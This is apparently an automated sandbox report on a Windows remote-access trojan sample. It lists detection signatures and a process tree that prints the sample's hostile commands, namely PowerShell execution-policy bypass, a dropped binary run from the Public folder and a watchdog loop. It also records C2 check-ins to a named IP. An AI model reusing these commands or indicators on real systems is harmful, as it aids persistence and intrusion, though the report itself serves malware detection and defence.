Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CnjMEmbChO.exe

Overview

General Information

Sample name:CnjMEmbChO.exe
Analysis ID:1581089
MD5:6b64f2cd11ec2223c9818e0f752c649e
SHA1:99948f90acbcf025a4462f1fe49c2f6f75817fbb
SHA256:b43c39baeb60972d82f592e681f4d20aac4c4063676f34d43b10cda806d08ac6
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • CnjMEmbChO.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\CnjMEmbChO.exe" MD5: 6B64F2CD11EC2223C9818E0F752C649E)
    • cmd.exe (PID: 7908 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • RuntimeBrokers.exe (PID: 4252 cmdline: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe MD5: 30A274E00DA842B09E9763F19777ADED)
        • cmd.exe (PID: 7216 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • tasklist.exe (PID: 5772 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7776 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 3412 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2468 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5144 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1256 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 4640 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 4848 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7548 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8148 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7864 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7472 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6060 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2228 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5636 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3148 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2788 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 3644 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5804 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3576 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4984 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3932 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5976 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 1492 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7640 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6752 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2036 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5848 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5136 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2720 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6672 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7772 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6520 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 6812 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2348 cmdline: findstr /I "RuntimeBrokers.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4116 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 1220 cmdline: tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • cmd.exe (PID: 5156 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 4836 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3692 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 2480 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, CommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7908, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ProcessId: 4252, ProcessName: RuntimeBrokers.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentImage: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, ParentProcessId: 4252, ParentProcessName: RuntimeBrokers.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 5156, ProcessName: cmd.exe
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 198.44.170.193, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe, Initiated: true, ProcessId: 4252, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49753
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5156, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 4836, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5156, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 4836, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-26T23:14:32.294393+010020528751A Network Trojan was detected192.168.11.2049754198.44.170.19318091TCP
2024-12-26T23:20:09.223127+010020528751A Network Trojan was detected192.168.11.2049769198.44.170.19318091TCP
2024-12-26T23:21:20.832304+010020528751A Network Trojan was detected192.168.11.2049773198.44.170.19318091TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 65%
Source: C:\Users\Public\Bilite\Axialis\libcurl.dllReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: CnjMEmbChO.exeReversingLabs: Detection: 50%
Source: CnjMEmbChO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb< source: powershell.exe, 0000000F.00000002.85573201377.000000000715F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85578617480.000000000848E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb, source: powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \YSS\Release\libcurl.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.85573201377.000000000715F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000000F.00000002.85572145117.00000000070E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G:\ZCSD\XZRecordAlone\xzrecordalone\Release\XZCalendarServer.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.85577677718.00000000083A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000F.00000002.85578337890.0000000008466000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\workspace\GTChecker\plutus\main\dev\target\win\Release\GTCheck.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb| source: powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\ymishra\Documents\GitHub\Dev\target\win\Release\Adobe Download Manager.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: z:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: x:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: v:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: t:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: r:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: p:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: n:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: l:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: j:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: h:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: f:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: d:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: b:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: y:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: w:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: u:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: s:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: q:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: o:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: m:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: k:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: i:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: g:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile opened: [:Jump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49754 -> 198.44.170.193:18091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49769 -> 198.44.170.193:18091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.11.20:49773 -> 198.44.170.193:18091
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 198.44.170.193 ports 18852,18091,18092,1,2,5,8
Source: global trafficTCP traffic: 192.168.11.20:49753 -> 198.44.170.193:18852
Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: unknownTCP traffic detected without corresponding DNS query: 198.44.170.193
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000E.00000002.85555320283.0000000003454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000E.00000002.85555320283.0000000003454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000E.00000002.85573109453.0000000008BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micu
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
